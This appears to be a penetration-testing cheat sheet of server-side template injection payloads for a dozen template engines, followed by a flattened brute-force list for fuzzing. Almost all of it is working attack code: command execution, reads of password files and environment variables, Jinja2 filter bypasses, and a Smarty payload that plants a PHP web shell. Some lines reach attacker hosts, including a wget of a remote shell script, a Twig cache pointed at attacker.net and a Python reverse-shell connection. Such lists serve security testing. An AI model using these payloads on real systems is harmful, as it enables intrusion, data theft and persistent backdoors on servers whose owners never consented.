Server Side Template Injection (SSTI)

ASP.NET

Razor

@(1+2)
//Command execution
@{
//Code in C#
}

CSS

Lessjs

#SSRF / LFI
@import (inline) "http://localhost";
@import (inline) "/etc/passwd";
#Remote Command Execution (backtick inline JavaScript only runs when the Less compiler has javascriptEnabled set; it is off by default since Less 3.0)
body {
color: `global.process.mainModule.require("child_process").execSync("id")`;
}

Java (the `T(...)` static-type references below are Spring Expression Language (SpEL) syntax and are specific to that engine)

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
//Retrieve system's environment variables
${T(java.lang.System).getenv()}
//Read File
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Expression Language EL

${1+1}
#{1+1}
//DNS Lookup
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
//Common RCE payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start()
//Method using Runtime
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
#{session.getAttribute("rtc").setAccessible(true)}
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
//Method using processbuilder
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
${request.getAttribute("c").add("cmd.exe")}
${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("ping x.x.x.x")}
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
${request.getAttribute("a")}
//Method using Reflection & Invoke (the getMethods() index of getRuntime is not stable across JVM builds; enumerate getMethods() first and adjust the index)
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
//Method using ScriptEngineManager one-liner (the \" and \\\" sequences here and below are escaped for delivery inside a double-quoted string such as a JSON body; unescape them for other injection contexts)
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")")}
//Method using ScriptEngineManager
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}

Freemarker

//Read File
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path_to_the_file').toURL().openStream().readAllBytes()?join(" ")}
//Code Execution (relies on the default `?new` class resolver; fails when new_builtin_class_resolver is set to "safer" or "allows_nothing", which block freemarker.template.utility.Execute)
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}

Pebble

//Remote Code Execution (getClass() is on Pebble's unsafe-method blocklist in recent 3.x releases unless allowUnsafeMethods is enabled, so this works mainly on older versions)
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}

Velocity (requires the VelocityTools `$class` ClassTool to be present in the template context)

#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

JavaScript

Handlebars

//Command Execution (prototype-access gadget chain; Handlebars 4.6.0 and later disable prototype property/method access by default, so expect this on older versions or permissive configurations)
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').execSync('ls -la');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

PHP

Smarty

{$smarty.version}
{php}echo `id`;{/php} // {php} blocks were dropped from the Smarty 3.1 core (only available via the SmartyBC class) and removed in Smarty 4
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3

Twig

{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
{{app.request.server.all|join(',')}}
#File Read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
#Remote Code Execution (the `_self.env` payloads rely on Twig 1.x internals; in Twig 2+ `_self` is just the template name, and the `|filter('system')` form needs Twig 2.10 or later, where the filter filter exists)
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}

Python

Jinja2 (several payloads below use Flask-only globals such as config, request and get_flashed_messages)

{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
{{config.items()}}
<pre>{% debug %}</pre>
#Dump all used classes (`__mro__[2]` assumes the Python 2 str -> basestring -> object chain; on Python 3 use `__mro__[1]` or `__mro__[-1]` to reach object)
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
#Dump all config variables (iteritems() is Python 2 only; on Python 3 use config.items())
{% for key, value in config.iteritems() %}
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
{% endfor %}
#Read remote file (index 40 is the Python 2 `file` class; subclass indexes vary by interpreter and loaded modules, so dump `__subclasses__()` first and pick the class by name)
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
#Write into remote file
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
#Remote Code Execution
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
#Bypass '_'
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
#Bypass [ and ]
{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
#Bypass |join
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
#Bypass most common filters
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

Mako

#Access to OS module
${self.module.cache.util.os.system("id")}
${self.module.runtime.util.os.system("id")}
${self.template.module.cache.util.os.system("id")}
${self.module.cache.compat.inspect.os.system("id")}
${self.__init__.__globals__['util'].os.system('id')}
${self.template.module.runtime.util.os.system("id")}
${self.module.filters.compat.inspect.os.system("id")}
${self.module.runtime.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.util.os.system("id")}
${self.template.__init__.__globals__['os'].system('id')}
${self.module.cache.util.compat.inspect.os.system("id")}
${self.module.runtime.util.compat.inspect.os.system("id")}
${self.template._mmarker.module.cache.util.os.system("id")}
${self.template.module.cache.compat.inspect.os.system("id")}
${self.module.cache.compat.inspect.linecache.os.system("id")}
${self.template._mmarker.module.runtime.util.os.system("id")}
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
${self.template.module.filters.compat.inspect.os.system("id")}
${self.template.module.runtime.compat.inspect.os.system("id")}
${self.module.filters.compat.inspect.linecache.os.system("id")}
${self.module.runtime.compat.inspect.linecache.os.system("id")}
${self.template.module.runtime.exceptions.util.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
${self.context._with_template.module.cache.util.os.system("id")}
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
${self.template.module.cache.util.compat.inspect.os.system("id")}
${self.context._with_template.module.runtime.util.os.system("id")}
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
${self.template.module.runtime.util.compat.inspect.os.system("id")}
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}

Ruby

<%= 7 * 7 %>
#{ 7 * 7 }
#Read File
<%= File.open('/etc/passwd').read %>
#List files and directories
<%= Dir.entries('/') %>
#Code Execution (open3 is in the Ruby standard library; open4 is a third-party gem and only works if the target bundles it)
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>

Intruder Brute Force List (the payloads above flattened to one per line for fuzzing; each entry is engine-specific, so a non-error response is only an indicator — confirm with an engine-specific probe before relying on it)

"{{'/etc/passwd'|file_excerpt(1,30)}}"@
#{ 3 * 3 }
#{ 7 * 7 }
#{1+1}
#{3*3}
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
#{session.getAttribute("rtc").setAccessible(true)}
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
${"freemarker.template.utility.Execute"?new()("id")}
${1+1}
${6*6}
${7*7}
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
${T(java.lang.System).getenv()}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
${request.getAttribute("a")}
${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("cmd.exe")}
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
${self.__init__.__globals__['util'].os.system('id')}
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
${self.context._with_template.module.cache.util.os.system("id")}
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
${self.context._with_template.module.runtime.util.os.system("id")}
${self.module.cache.compat.inspect.linecache.os.system("id")}
${self.module.cache.compat.inspect.os.system("id")}
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
${self.module.cache.util.compat.inspect.os.system("id")}
${self.module.cache.util.os.system("id")}
${self.module.filters.compat.inspect.linecache.os.system("id")}
${self.module.filters.compat.inspect.os.system("id")}
${self.module.runtime.compat.inspect.linecache.os.system("id")}
${self.module.runtime.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.util.os.system("id")}
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
${self.module.runtime.util.compat.inspect.os.system("id")}
${self.module.runtime.util.os.system("id")}
${self.template.__init__.__globals__['os'].system('id')}
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
${self.template._mmarker.module.cache.util.os.system("id")}
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
${self.template._mmarker.module.runtime.util.os.system("id")}
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
${self.template.module.cache.compat.inspect.os.system("id")}
${self.template.module.cache.util.compat.inspect.os.system("id")}
${self.template.module.cache.util.os.system("id")}
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
${self.template.module.filters.compat.inspect.os.system("id")}
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
${self.template.module.runtime.compat.inspect.os.system("id")}
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
${self.template.module.runtime.exceptions.util.os.system("id")}
${self.template.module.runtime.util.compat.inspect.os.system("id")}
${self.template.module.runtime.util.os.system("id")}
${{3*3}}
${{7*7}}
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
<%= 3 * 3 %>
<%= 7 * 7 %>
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>
<%= IO.popen('ls /').readlines() %>
<%= `ls /` %>
<%= system('cat /etc/passwd') %>
<pre>{% debug %}</pre>
@(1+2)
@(6+5)
@import (inline) "/etc/passwd";
@import (inline) "http://localhost";
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
body {color: `global.process.mainModule.require("child_process").execSync("id")`;}
{$smarty.version}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{php}echo `id`;{/php}
{php}echo `id`;{/php} //deprecated in smarty v3
{system('cat index.php')}
{system('ls')}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
{{ [].class.base.subclasses() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{ request }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.class.mro()[1].subclasses()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.toUpperCase()}}
{{2*2}}[[3*3]]
{{3*'3'}}
{{3*3}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 49
{{7*'7'}} would result in 7777777
{{7*7}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['id']|filter('system')}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{app.request.server.all|join(',')}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{config.items()}}
{{dump(app)}}
{{request.__class__}}
{{request|attr("__class__")}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
{{self}}

References

GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool